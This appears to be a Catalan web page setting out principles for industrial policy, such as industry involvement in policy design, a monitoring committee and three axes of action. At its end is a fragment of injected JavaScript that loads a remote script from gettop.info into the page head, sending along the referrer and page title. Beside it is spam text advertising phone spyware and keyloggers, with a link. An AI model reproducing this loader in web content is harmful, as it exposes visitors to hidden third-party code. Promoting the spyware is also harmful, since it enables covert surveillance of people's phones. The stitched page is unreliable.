General

Principis que haurien de guiar la política industrial

  •  Les mesures de política industrial haurien de ser el resultat d’una major presència del sector industrial i manufacturer en el disseny de les polítiques industrials i en la seva aplicació.
  • Caldria disposar d’indicadors del grau d’avenç cap una potenciació de la industria en el context de relocalització; El seguiment  de l’evolució i eficiència de les polítiques Industria hauria de confiar-se a un Comitè de Seguiment del Desenvolupament industrial de Catalunya.
  • És necessari el suport d’una Conselleria d’Indústria propera a l’empresa, coneixedora dels seus problemes i reptes i amb capacitat d’escoltar propostes i convertir-les en programes d’acció.
  • Cal rellançar la figura d’empresari-industrial i revaloritzar socialment la seva imatge, com a creador de riquesa i ocupació.
  • Actuar en 3 eixos:
  1. Potenciar la Industria tant en l’àmbit d’alt valor afegit, com en la intensiva en ma d’obra (industria manufacturera amb baixa inversió per lloc de treball)
  2. Facilitar el sorgiment de pols industrials manufacturers competitius al combinar treball i formació reglada i acreditada.
  3. Valoritzar les capacitats del territori.

s.src='https://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; }d.getElementsByTagName('head')[0].appendChild(s);call tracker, spy program android, keylogger for iphonehttp://bullseye-studio.com/spy-software-xnore-spy-app-highster/